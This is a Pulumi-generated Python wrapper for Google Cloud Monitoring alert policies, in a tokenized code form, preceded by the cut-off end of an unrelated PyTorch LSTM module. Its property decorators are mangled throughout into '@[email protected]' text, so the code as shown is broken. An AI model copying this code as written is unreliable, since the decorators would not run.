t]<line_sep>h_0_t=self.embedding(x_t)<line_sep>h_1_t,c_1_t=self.lstm_cell(h_0_t (h_1_tm1 c_1_tm1))<line_sep>h_2_t=self.output_cell(h_1_t h_2_tm1)<line_sep># Just use previuse results if x is a <pad> token h_2_t=torch.where(x[: t].view(-1 1)<eq>0 h_2_tm1 h_2_t)<line_sep># Prepear for next iterations h_1_tm1=h_1_t<line_sep>c_1_tm1=c_1_t<line_sep>h_2_tm1=h_2_t<block_end><return>h_2_t<block_end><def_stmt>extra_repr self<block_start><return>'unit_name={}, embedding_size={}, hidden_size={}, dictionary_size={}'.format(self.unit_name self.embedding_size self.hidden_size self.dictionary_size)<block_end><block_end>
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** <import_stmt>warnings<import_stmt>pulumi<import_stmt>pulumi.runtime<import_from_stmt>typing Any Mapping Optional Sequence Union overload<import_from_stmt>.. _utilities<import_from_stmt>. outputs<import_from_stmt>._inputs *<line_sep>__all__=['AlertPolicyArgs' 'AlertPolicy']<line_sep>@pulumi.input_type<class_stmt>AlertPolicyArgs<block_start><def_stmt>__init__ __self__ * combiner:pulumi.Input[str] conditions:pulumi.Input[Sequence[pulumi.Input['AlertPolicyConditionArgs']]] display_name:pulumi.Input[str] documentation:Optional[pulumi.Input['AlertPolicyDocumentationArgs']]=<none> enabled:Optional[pulumi.Input[bool]]=<none> notification_channels:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> project:Optional[pulumi.Input[str]]=<none> user_labels:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]=<none><block_start>""" The set of arguments for constructing a AlertPolicy resource. :param pulumi.Input[str] combiner: How to combine the results of multiple conditions to determine if an incident should be opened. Possible values are `AND`, `OR`, and `AND_WITH_MATCHING_RESOURCE`. :param pulumi.Input[Sequence[pulumi.Input['AlertPolicyConditionArgs']]] conditions: A list of conditions for the policy. The conditions are combined by AND or OR according to the combiner field. If the combined conditions evaluate to true, then an incident is created. A policy can have from one to six conditions. Structure is documented below. :param pulumi.Input[str] display_name: A short name or phrase used to identify the condition in dashboards, notifications, and incidents. To avoid confusion, don't use the same display name for multiple conditions in the same policy. :param pulumi.Input['AlertPolicyDocumentationArgs'] documentation: Documentation that is included with notifications and incidents related to this policy. Best practice is for the documentation to include information to help responders understand, mitigate, escalate, and correct the underlying problems detected by the alerting policy. Notification channels that have limited capacity might not show this documentation. Structure is documented below. :param pulumi.Input[bool] enabled: Whether or not the policy is enabled. The default is true. :param pulumi.Input[Sequence[pulumi.Input[str]]] notification_channels: Identifies the notification channels to which notifications should be sent when incidents are opened or closed or when new violations occur on an already opened incident. Each element of this array corresponds to the name field in each of the NotificationChannel objects that are returned from the notificationChannels.list method. The syntax of the entries in this field is `projects/[PROJECT_ID]/notificationChannels/[CHANNEL_ID]` :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] user_labels: This field is intended to be used for organizing and identifying the AlertPolicy objects.The field can contain up to 64 entries. Each key and value is limited to 63 Unicode characters or 128 bytes, whichever is smaller. Labels and values can contain only lowercase letters, numerals, underscores, and dashes. Keys must begin with a letter. """<line_sep>pulumi.set(__self__ "combiner" combiner)<line_sep>pulumi.set(__self__ "conditions" conditions)<line_sep>pulumi.set(__self__ "display_name" display_name)<if_stmt>documentation<is><not><none><block_start>pulumi.set(__self__ "documentation" documentation)<block_end><if_stmt>enabled<is><not><none><block_start>pulumi.set(__self__ "enabled" enabled)<block_end><if_stmt>notification_channels<is><not><none><block_start>pulumi.set(__self__ "notification_channels" notification_channels)<block_end><if_stmt>project<is><not><none><block_start>pulumi.set(__self__ "project" project)<block_end><if_stmt>user_labels<is><not><none><block_start>pulumi.set(__self__ "user_labels" user_labels)<block_end><block_end>@[email protected]<def_stmt>combiner self<arrow>pulumi.Input[str]<block_start>""" How to combine the results of multiple conditions to determine if an incident should be opened. Possible values are `AND`, `OR`, and `AND_WITH_MATCHING_RESOURCE`. """<line_sep><return>pulumi.get(self "combiner")<block_end>@combiner.setter<def_stmt>combiner self value:pulumi.Input[str]<block_start>pulumi.set(self "combiner" value)<block_end>@[email protected]<def_stmt>conditions self<arrow>pulumi.Input[Sequence[pulumi.Input['AlertPolicyConditionArgs']]]<block_start>""" A list of conditions for the policy. The conditions are combined by AND or OR according to the combiner field. If the combined conditions evaluate to true, then an incident is created. A policy can have from one to six conditions. Structure is documented below. """<line_sep><return>pulumi.get(self "conditions")<block_end>@conditions.setter<def_stmt>conditions self value:pulumi.Input[Sequence[pulumi.Input['AlertPolicyConditionArgs']]]<block_start>pulumi.set(self "conditions" value)<block_end>@[email protected](name="displayName")<def_stmt>display_name self<arrow>pulumi.Input[str]<block_start>""" A short name or phrase used to identify the condition in dashboards, notifications, and incidents. To avoid confusion, don't use the same display name for multiple conditions in the same policy. """<line_sep><return>pulumi.get(self "display_name")<block_end>@display_name.setter<def_stmt>display_name self value:pulumi.Input[str]<block_start>pulumi.set(self "display_name" value)<block_end>@[email protected]<def_stmt>documentation self<arrow>Optional[pulumi.Input['AlertPolicyDocumentationArgs']]<block_start>""" Documentation that is included with notifications and incidents related to this policy. Best practice is for the documentation to include information to help responders understand, mitigate, escalate, and correct the underlying problems detected by the alerting policy. Notification channels that have limited capacity might not show this documentation. Structure is documented below. """<line_sep><return>pulumi.get(self "documentation")<block_end>@documentation.setter<def_stmt>documentation self value:Optional[pulumi.Input['AlertPolicyDocumentationArgs']]<block_start>pulumi.set(self "documentation" value)<block_end>@[email protected]<def_stmt>enabled self<arrow>Optional[pulumi.Input[bool]]<block_start>""" Whether or not the policy is enabled. The default is true. """<line_sep><return>pulumi.get(self "enabled")<block_end>@enabled.setter<def_stmt>enabled self value:Optional[pulumi.Input[bool]]<block_start>pulumi.set(self "enabled" value)<block_end>@[email protected](name="notificationChannels")<def_stmt>notification_channels self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>""" Identifies the notification channels to which notifications should be sent when incidents are opened or closed or when new violations occur on an already opened incident. Each element of this array corresponds to the name field in each of the NotificationChannel objects that are returned from the notificationChannels.list method. The syntax of the entries in this field is `projects/[PROJECT_ID]/notificationChannels/[CHANNEL_ID]` """<line_sep><return>pulumi.get(self "notification_channels")<block_end>@notification_channels.setter<def_stmt>notification_channels self value:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>pulumi.set(self "notification_channels" value)<block_end>@[email protected]<def_stmt>project self<arrow>Optional[pulumi.Input[str]]<block_start>""" The ID of the project in which the resource belongs. If it is not provided, the provider project is used. """<line_sep><return>pulumi.get(self "project")<block_end>@project.setter<def_stmt>project self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "project" value)<block_end>@[email protected](name="userLabels")<def_stmt>user_labels self<arrow>Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]<block_start>""" This field is intended to be used for organizing and identifying the AlertPolicy objects.The field can contain up to 64 entries. Each key and value is limited to 63 Unicode characters or 128 bytes, whichever is smaller. Labels and values can contain only lowercase letters, numerals, underscores, and dashes. Keys must begin with a letter. """<line_sep><return>pulumi.get(self "user_labels")<block_end>@user_labels.setter<def_stmt>user_labels self value:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]<block_start>pulumi.set(self "user_labels" value)<block_end><block_end>@pulumi.input_type<class_stmt>_AlertPolicyState<block_start><def_stmt>__init__ __self__ * combiner:Optional[pulumi.Input[str]]=<none> conditions:Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyConditionArgs']]]]=<none> creation_records:Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyCreationRecordArgs']]]]=<none> display_name:Optional[pulumi.Input[str]]=<none> documentation:Optional[pulumi.Input['AlertPolicyDocumentationArgs']]=<none> enabled:Optional[pulumi.Input[bool]]=<none> name:Optional[pulumi.Input[str]]=<none> notification_channels:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> project:Optional[pulumi.Input[str]]=<none> user_labels:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]=<none><block_start>""" Input properties used for looking up and filtering AlertPolicy resources. :param pulumi.Input[str] combiner: How to combine the results of multiple conditions to determine if an incident should be opened. Possible values are `AND`, `OR`, and `AND_WITH_MATCHING_RESOURCE`. :param pulumi.Input[Sequence[pulumi.Input['AlertPolicyConditionArgs']]] conditions: A list of conditions for the policy. The conditions are combined by AND or OR according to the combiner field. If the combined conditions evaluate to true, then an incident is created. A policy can have from one to six conditions. Structure is documented below. :param pulumi.Input[Sequence[pulumi.Input['AlertPolicyCreationRecordArgs']]] creation_records: A read-only record of the creation of the alerting policy. If provided in a call to create or update, this field will be ignored. :param pulumi.Input[str] display_name: A short name or phrase used to identify the condition in dashboards, notifications, and incidents. To avoid confusion, don't use the same display name for multiple conditions in the same policy. :param pulumi.Input['AlertPolicyDocumentationArgs'] documentation: Documentation that is included with notifications and incidents related to this policy. Best practice is for the documentation to include information to help responders understand, mitigate, escalate, and correct the underlying problems detected by the alerting policy. Notification channels that have limited capacity might not show this documentation. Structure is documented below. :param pulumi.Input[bool] enabled: Whether or not the policy is enabled. The default is true. :param pulumi.Input[str] name: - The unique resource name for this condition. Its syntax is: projects/[PROJECT_ID]/alertPolicies/[POLICY_ID]/conditions/[CONDITION_ID] [CONDITION_ID] is assigned by Stackdriver Monitoring when the condition is created as part of a new or updated alerting policy. :param pulumi.Input[Sequence[pulumi.Input[str]]] notification_channels: Identifies the notification channels to which notifications should be sent when incidents are opened or closed or when new violations occur on an already opened incident. Each element of this array corresponds to the name field in each of the NotificationChannel objects that are returned from the notificationChannels.list method. The syntax of the entries in this field is `projects/[PROJECT_ID]/notificationChannels/[CHANNEL_ID]` :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] user_labels: This field is intended to be used for organizing and identifying the AlertPolicy objects.The field can contain up to 64 entries. Each key and value is limited to 63 Unicode characters or 128 bytes, whichever is smaller. Labels and values can contain only lowercase letters, numerals, underscores, and dashes. Keys must begin with a letter. """<if_stmt>combiner<is><not><none><block_start>pulumi.set(__self__ "combiner" combiner)<block_end><if_stmt>conditions<is><not><none><block_start>pulumi.set(__self__ "conditions" conditions)<block_end><if_stmt>creation_records<is><not><none><block_start>pulumi.set(__self__ "creation_records" creation_records)<block_end><if_stmt>display_name<is><not><none><block_start>pulumi.set(__self__ "display_name" display_name)<block_end><if_stmt>documentation<is><not><none><block_start>pulumi.set(__self__ "documentation" documentation)<block_end><if_stmt>enabled<is><not><none><block_start>pulumi.set(__self__ "enabled" enabled)<block_end><if_stmt>name<is><not><none><block_start>pulumi.set(__self__ "name" name)<block_end><if_stmt>notification_channels<is><not><none><block_start>pulumi.set(__self__ "notification_channels" notification_channels)<block_end><if_stmt>project<is><not><none><block_start>pulumi.set(__self__ "project" project)<block_end><if_stmt>user_labels<is><not><none><block_start>pulumi.set(__self__ "user_labels" user_labels)<block_end><block_end>@[email protected]<def_stmt>combiner self<arrow>Optional[pulumi.Input[str]]<block_start>""" How to combine the results of multiple conditions to determine if an incident should be opened. Possible values are `AND`, `OR`, and `AND_WITH_MATCHING_RESOURCE`. """<line_sep><return>pulumi.get(self "combiner")<block_end>@combiner.setter<def_stmt>combiner self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "combiner" value)<block_end>@[email protected]<def_stmt>conditions self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyConditionArgs']]]]<block_start>""" A list of conditions for the policy. The conditions are combined by AND or OR according to the combiner field. If the combined conditions evaluate to true, then an incident is created. A policy can have from one to six conditions. Structure is documented below. """<line_sep><return>pulumi.get(self "conditions")<block_end>@conditions.setter<def_stmt>conditions self value:Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyConditionArgs']]]]<block_start>pulumi.set(self "conditions" value)<block_end>@[email protected](name="creationRecords")<def_stmt>creation_records self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyCreationRecordArgs']]]]<block_start>""" A read-only record of the creation of the alerting policy. If provided in a call to create or update, this field will be ignored. """<line_sep><return>pulumi.get(self "creation_records")<block_end>@creation_records.setter<def_stmt>creation_records self value:Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyCreationRecordArgs']]]]<block_start>pulumi.set(self "creation_records" value)<block_end>@[email protected](name="displayName")<def_stmt>display_name self<arrow>Optional[pulumi.Input[str]]<block_start>""" A short name or phrase used to identify the condition in dashboards, notifications, and incidents. To avoid confusion, don't use the same display name for multiple conditions in the same policy. """<line_sep><return>pulumi.get(self "display_name")<block_end>@display_name.setter<def_stmt>display_name self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "display_name" value)<block_end>@[email protected]<def_stmt>documentation self<arrow>Optional[pulumi.Input['AlertPolicyDocumentationArgs']]<block_start>""" Documentation that is included with notifications and incidents related to this policy. Best practice is for the documentation to include information to help responders understand, mitigate, escalate, and correct the underlying problems detected by the alerting policy. Notification channels that have limited capacity might not show this documentation. Structure is documented below. """<line_sep><return>pulumi.get(self "documentation")<block_end>@documentation.setter<def_stmt>documentation self value:Optional[pulumi.Input['AlertPolicyDocumentationArgs']]<block_start>pulumi.set(self "documentation" value)<block_end>@[email protected]<def_stmt>enabled self<arrow>Optional[pulumi.Input[bool]]<block_start>""" Whether or not the policy is enabled. The default is true. """<line_sep><return>pulumi.get(self "enabled")<block_end>@enabled.setter<def_stmt>enabled self value:Optional[pulumi.Input[bool]]<block_start>pulumi.set(self "enabled" value)<block_end>@[email protected]<def_stmt>name self<arrow>Optional[pulumi.Input[str]]<block_start>""" - The unique resource name for this condition. Its syntax is: projects/[PROJECT_ID]/alertPolicies/[POLICY_ID]/conditions/[CONDITION_ID] [CONDITION_ID] is assigned by Stackdriver Monitoring when the condition is created as part of a new or updated alerting policy. """<line_sep><return>pulumi.get(self "name")<block_end>@name.setter<def_stmt>name self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "name" value)<block_end>@[email protected](name="notificationChannels")<def_stmt>notification_channels self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>""" Identifies the notification channels to which notifications should be sent when incidents are opened or closed or when new violations occur on an already opened incident. Each element of this array corresponds to the name field in each of the NotificationChannel objects that are returned from the notificationChannels.list method. The syntax of the entries in this field is `projects/[PROJECT_ID]/notificationChannels/[CHANNEL_ID]` """<line_sep><return>pulumi.get(self "notification_channels")<block_end>@notification_channels.setter<def_stmt>notification_channels self value:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>pulumi.set(self "notification_channels" value)<block_end>@[email protected]<def_stmt>project self<arrow>Optional[pulumi.Input[str]]<block_start>""" The ID of the project in which the resource belongs. If it is not provided, the provider project is used. """<line_sep><return>pulumi.get(self "project")<block_end>@project.setter<def_stmt>project self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "project" value)<block_end>@[email protected](name="userLabels")<def_stmt>user_labels self<arrow>Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]<block_start>""" This field is intended to be used for organizing and identifying the AlertPolicy objects.The field can contain up to 64 entries. Each key and value is limited to 63 Unicode characters or 128 bytes, whichever is smaller. Labels and values can contain only lowercase letters, numerals, underscores, and dashes. Keys must begin with a letter. """<line_sep><return>pulumi.get(self "user_labels")<block_end>@user_labels.setter<def_stmt>user_labels self value:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]<block_start>pulumi.set(self "user_labels" value)<block_end><block_end><class_stmt>AlertPolicy(pulumi.CustomResource)<block_start>@overload<def_stmt>__init__ __self__ resource_name:str opts:Optional[pulumi.ResourceOptions]=<none> combiner:Optional[pulumi.Input[str]]=<none> conditions:Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertPolicyConditionArgs']]]]]=<none> display_name:Optional[pulumi.Input[str]]=<none> documentation:Optional[pulumi.Input[pulumi.InputType['AlertPolicyDocumentationArgs']]]=<none> enabled:Optional[pulumi.Input[bool]]=<none> notification_channels:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> project:Optional[pulumi.Input[str]]=<none> user_labels:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]=<none> __props__=<none><block_start>""" A description of the conditions under which some aspect of your system is considered to be "unhealthy" and the ways to notify people or services about this state. To get more information about AlertPolicy, see: * [API documentation](https://cloud.google.com/monitoring/api/ref_v3/rest/v3/projects.alertPolicies) * How-to Guides * [Official Documentation](https://cloud.google.com/monitoring/alerts/) ## Example Usage ### Monitoring Alert Policy Basic ```python import pulumi import pulumi_gcp as gcp alert_policy = gcp.monitoring.AlertPolicy("alertPolicy", combiner="OR", conditions=[gcp.monitoring.AlertPolicyConditionArgs( condition_threshold=gcp.monitoring.AlertPolicyConditionConditionThresholdArgs( aggregations=[gcp.monitoring.AlertPolicyConditionConditionThresholdAggregationArgs( alignment_period="60s", per_series_aligner="ALIGN_RATE", )], comparison="COMPARISON_GT", duration="60s", filter="metric.type=\"compute.googleapis.com/instance/disk/write_bytes_count\" AND resource.type=\"gce_instance\"", ), display_name="test condition", )], display_name="My Alert Policy", user_labels={ "foo": "bar", }) ``` ## Import AlertPolicy can be imported using any of these accepted formats ```sh $ pulumi import gcp:monitoring/alertPolicy:AlertPolicy default {{name}} ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] combiner: How to combine the results of multiple conditions to determine if an incident should be opened. Possible values are `AND`, `OR`, and `AND_WITH_MATCHING_RESOURCE`. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertPolicyConditionArgs']]]] conditions: A list of conditions for the policy. The conditions are combined by AND or OR according to the combiner field. If the combined conditions evaluate to true, then an incident is created. A policy can have from one to six conditions. Structure is documented below. :param pulumi.Input[str] display_name: A short name or phrase used to identify the condition in dashboards, notifications, and incidents. To avoid confusion, don't use the same display name for multiple conditions in the same policy. :param pulumi.Input[pulumi.InputType['AlertPolicyDocumentationArgs']] documentation: Documentation that is included with notifications and incidents related to this policy. Best practice is for the documentation to include information to help responders understand, mitigate, escalate, and correct the underlying problems detected by the alerting policy. Notification channels that have limited capacity might not show this documentation. Structure is documented below. :param pulumi.Input[bool] enabled: Whether or not the policy is enabled. The default is true. :param pulumi.Input[Sequence[pulumi.Input[str]]] notification_channels: Identifies the notification channels to which notifications should be sent when incidents are opened or closed or when new violations occur on an already opened incident. Each element of this array corresponds to the name field in each of the NotificationChannel objects that are returned from the notificationChannels.list method. The syntax of the entries in this field is `projects/[PROJECT_ID]/notificationChannels/[CHANNEL_ID]` :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] user_labels: This field is intended to be used for organizing and identifying the AlertPolicy objects.The field can contain up to 64 entries. Each key and value is limited to 63 Unicode characters or 128 bytes, whichever is smaller. Labels and values can contain only lowercase letters, numerals, underscores, and dashes. Keys must begin with a letter. """<line_sep><ellipsis><block_end>@overload<def_stmt>__init__ __self__ resource_name:str args:AlertPolicyArgs opts:Optional[pulumi.ResourceOptions]=<none><block_start>""" A description of the conditions under which some aspect of your system is considered to be "unhealthy" and the ways to notify people or services about this state. To get more information about AlertPolicy, see: * [API documentation](https://cloud.google.com/monitoring/api/ref_v3/rest/v3/projects.alertPolicies) * How-to Guides * [Official Documentation](https://cloud.google.com/monitoring/alerts/) ## Example Usage ### Monitoring Alert Policy Basic ```python import pulumi import pulumi_gcp as gcp alert_policy = gcp.monitoring.AlertPolicy("alertPolicy", combiner="OR", conditions=[gcp.monitoring.AlertPolicyConditionArgs( condition_threshold=gcp.monitoring.AlertPolicyConditionConditionThresholdArgs( aggregations=[gcp.monitoring.AlertPolicyConditionConditionThresholdAggregationArgs( alignment_period="60s", per_series_aligner="ALIGN_RATE", )], comparison="COMPARISON_GT", duration="60s", filter="metric.type=\"compute.googleapis.com/instance/disk/write_bytes_count\" AND resource.type=\"gce_instance\"", ), display_name="test condition", )], display_name="My Alert Policy", user_labels={ "foo": "bar", }) ``` ## Import AlertPolicy can be imported using any of these accepted formats ```sh $ pulumi import gcp:monitoring/alertPolicy:AlertPolicy default {{name}} ``` :param str resource_name: The name of the resource. :param AlertPolicyArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """<line_sep><ellipsis><block_end><def_stmt>__init__ __self__ resource_name:str *args **kwargs<block_start>resource_args,opts=_utilities.get_resource_args_opts(AlertPolicyArgs pulumi.ResourceOptions *args **kwargs)<if_stmt>resource_args<is><not><none><block_start>__self__._internal_init(resource_name opts **resource_args.__dict__)<block_end><else_stmt><block_start>__self__._internal_init(resource_name *args **kwargs)<block_end><block_end><def_stmt>_internal_init __self__ resource_name:str opts:Optional[pulumi.ResourceOptions]=<none> combiner:Optional[pulumi.Input[str]]=<none> conditions:Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertPolicyConditionArgs']]]]]=<none> display_name:Optional[pulumi.Input[str]]=<none> documentation:Optional[pulumi.Input[pulumi.InputType['AlertPolicyDocumentationArgs']]]=<none> enabled:Optional[pulumi.Input[bool]]=<none> notification_channels:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> project:Optional[pulumi.Input[str]]=<none> user_labels:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]=<none> __props__=<none><block_start><if_stmt>opts<is><none><block_start>opts=pulumi.ResourceOptions()<block_end><if_stmt><not>isinstance(opts pulumi.ResourceOptions)<block_start><raise>TypeError('Expected resource options to be a ResourceOptions instance')<block_end><if_stmt>opts.version<is><none><block_start>opts.version=_utilities.get_version()<block_end><if_stmt>opts.id<is><none><block_start><if_stmt>__props__<is><not><none><block_start><raise>TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')<block_end>__props__=AlertPolicyArgs.__new__(AlertPolicyArgs)<if_stmt>combiner<is><none><and><not>opts.urn<block_start><raise>TypeError("Missing required property 'combiner'")<block_end>__props__.__dict__["combiner"]=combiner<if_stmt>conditions<is><none><and><not>opts.urn<block_start><raise>TypeError("Missing required property 'conditions'")<block_end>__props__.__dict__["conditions"]=conditions<if_stmt>display_name<is><none><and><not>opts.urn<block_start><raise>TypeError("Missing required property 'display_name'")<block_end>__props__.__dict__["display_name"]=display_name<line_sep>__props__.__dict__["documentation"]=documentation<line_sep>__props__.__dict__["enabled"]=enabled<line_sep>__props__.__dict__["notification_channels"]=notification_channels<line_sep>__props__.__dict__["project"]=project<line_sep>__props__.__dict__["user_labels"]=user_labels<line_sep>__props__.__dict__["creation_records"]=<none><line_sep>__props__.__dict__["name"]=<none><block_end>super(AlertPolicy __self__).__init__('gcp:monitoring/alertPolicy:AlertPolicy' resource_name __props__ opts)<block_end>@staticmethod<def_stmt>get resource_name:str id:pulumi.Input[str] opts:Optional[pulumi.ResourceOptions]=<none> combiner:Optional[pulumi.Input[str]]=<none> conditions:Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertPolicyConditionArgs']]]]]=<none> creation_records:Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertPolicyCreationRecordArgs']]]]]=<none> display_name:Optional[pulumi.Input[str]]=<none> documentation:Optional[pulumi.Input[pulumi.InputType['AlertPolicyDocumentationArgs']]]=<none> enabled:Optional[pulumi.Input[bool]]=<none> name:Optional[pulumi.Input[str]]=<none> notification_channels:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> project:Optional[pulumi.Input[str]]=<none> user_labels:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]=<none><arrow>'AlertPolicy'<block_start>""" Get an existing AlertPolicy resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] combiner: How to combine the results of multiple conditions to determine if an incident should be opened. Possible values are `AND`, `OR`, and `AND_WITH_MATCHING_RESOURCE`. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertPolicyConditionArgs']]]] conditions: A list of conditions for the policy. The conditions are combined by AND or OR according to the combiner field. If the combined conditions evaluate to true, then an incident is created. A policy can have from one to six conditions. Structure is documented below. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertPolicyCreationRecordArgs']]]] creation_records: A read-only record of the creation of the alerting policy. If provided in a call to create or update, this field will be ignored. :param pulumi.Input[str] display_name: A short name or phrase used to identify the condition in dashboards, notifications, and incidents. To avoid confusion, don't use the same display name for multiple conditions in the same policy. :param pulumi.Input[pulumi.InputType['AlertPolicyDocumentationArgs']] documentation: Documentation that is included with notifications and incidents related to this policy. Best practice is for the documentation to include information to help responders understand, mitigate, escalate, and correct the underlying problems detected by the alerting policy. Notification channels that have limited capacity might not show this documentation. Structure is documented below. :param pulumi.Input[bool] enabled: Whether or not the policy is enabled. The default is true. :param pulumi.Input[str] name: - The unique resource name for this condition. Its syntax is: projects/[PROJECT_ID]/alertPolicies/[POLICY_ID]/conditions/[CONDITION_ID] [CONDITION_ID] is assigned by Stackdriver Monitoring when the condition is created as part of a new or updated alerting policy. :param pulumi.Input[Sequence[pulumi.Input[str]]] notification_channels: Identifies the notification channels to which notifications should be sent when incidents are opened or closed or when new violations occur on an already opened incident. Each element of this array corresponds to the name field in each of the NotificationChannel objects that are returned from the notificationChannels.list method. The syntax of the entries in this field is `projects/[PROJECT_ID]/notificationChannels/[CHANNEL_ID]` :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] user_labels: This field is intended to be used for organizing and identifying the AlertPolicy objects.The field can contain up to 64 entries. Each key and value is limited to 63 Unicode characters or 128 bytes, whichever is smaller. Labels and values can contain only lowercase letters, numerals, underscores, and dashes. Keys must begin with a letter. """<line_sep>opts=pulumi.ResourceOptions.merge(opts pulumi.ResourceOptions(id=id))<line_sep>__props__=_AlertPolicyState.__new__(_AlertPolicyState)<line_sep>__props__.__dict__["combiner"]=combiner<line_sep>__props__.__dict__["conditions"]=conditions<line_sep>__props__.__dict__["creation_records"]=creation_records<line_sep>__props__.__dict__["display_name"]=display_name<line_sep>__props__.__dict__["documentation"]=documentation<line_sep>__props__.__dict__["enabled"]=enabled<line_sep>__props__.__dict__["name"]=name<line_sep>__props__.__dict__["notification_channels"]=notification_channels<line_sep>__props__.__dict__["project"]=project<line_sep>__props__.__dict__["user_labels"]=user_labels<line_sep><return>AlertPolicy(resource_name opts=opts __props__=__props__)<block_end>@[email protected]<def_stmt>combiner self<arrow>pulumi.Output[str]<block_start>""" How to combine the results of multiple conditions to determine if an incident should be opened. Possible values are `AND`, `OR`, and `AND_WITH_MATCHING_RESOURCE`. """<line_sep><return>pulumi.get(self "combiner")<block_end>@[email protected]<def_stmt>conditions self<arrow>pulumi.Output[Sequence['outputs.AlertPolicyCondition']]<block_start>""" A list of conditions for the policy. The conditions are combined by AND or OR according to the combiner field. If the combined conditions evaluate to true, then an incident is created. A policy can have from one to six conditions. Structure is documented below. """<line_sep><return>pulumi.get(self "conditions")<block_end>@[email protected](name="creationRecords")<def_stmt>creation_records self<arrow>pulumi.Output[Sequence['outputs.AlertPolicyCreationRecord']]<block_start>""" A read-only record of the creation of the alerting policy. If provided in a call to create or update, this field will be ignored. """<line_sep><return>pulumi.get(self "creation_records")<block_end>@[email protected](name="displayName")<def_stmt>display_name self<arrow>pulumi.Output[str]<block_start>""" A short name or phrase used to identify the condition in dashboards, notifications, and incidents. To avoid confusion, don't use the same display name for multiple conditions in the same policy. """<line_sep><return>pulumi.get(self "display_name")<block_end>@[email protected]<def_stmt>documentation self<arrow>pulumi.Output[Optional['outputs.AlertPolicyDocumentation']]<block_start>""" Documentation that is included with notifications and incidents related to this policy. Best practice is for the documentation to include information to help responders understand, mitigate, escalate, and correct the underlying problems detected by the alerting policy. Notification channels that have limited capacity might not show this documentation. Structure is documented below. """<line_sep><return>pulumi.get(self "documentation")<block_end>@[email protected]<def_stmt>enabled self<arrow>pulumi.Output[Optional[bool]]<block_start>""" Whether or not the policy is enabled. The default is true. """<line_sep><return>pulumi.get(self "enabled")<block_end>@[email protected]<def_stmt>name self<arrow>pulumi.Output[str]<block_start>""" - The unique resource name for this condition. Its syntax is: projects/[PROJECT_ID]/alertPolicies/[POLICY_ID]/conditions/[CONDITION_ID] [CONDITION_ID] is assigned by Stackdriver Monitoring when the condition is created as part of a new or updated alerting policy. """<line_sep><return>pulumi.get(self "name")<block_end>@[email protected](name="notificationChannels")<def_stmt>notification_channels self<arrow>pulumi.Output[Optional[Sequence[str]]]<block_start>""" Identifies the notification channels to which notifications should be sent when incidents are opened or closed or when new violations occur on an already opened incident. Each element of this array corresponds to the name field in each of the NotificationChannel objects that are returned from the notificationChannels.list method. The syntax of the entries in this field is `projects/[PROJECT_ID]/notificationChannels/[CHANNEL_ID]` """<line_sep><return>pulumi.get(self "notification_channels")<block_end>@[email protected]<def_stmt>project self<arrow>pulumi.Output[str]<block_start>""" The ID of the project in which the resource belongs. If it is not provided, the provider project is used. """<line_sep><return>pulumi.get(self "project")<block_end>@[email protected](name="userLabels")<def_stmt>user_labels self<arrow>pulumi.Output[Optional[Mapping[str str]]]<block_start>""" This field is intended to be used for organizing and identifying the AlertPolicy objects.The field can contain up to 64 entries. Each key and value is limited to 63 Unicode characters or 128 bytes, whichever is smaller. Labels and values can contain only lowercase letters, numerals, underscores, and dashes. Keys must begin with a letter. """<line_sep><return>pulumi.get(self 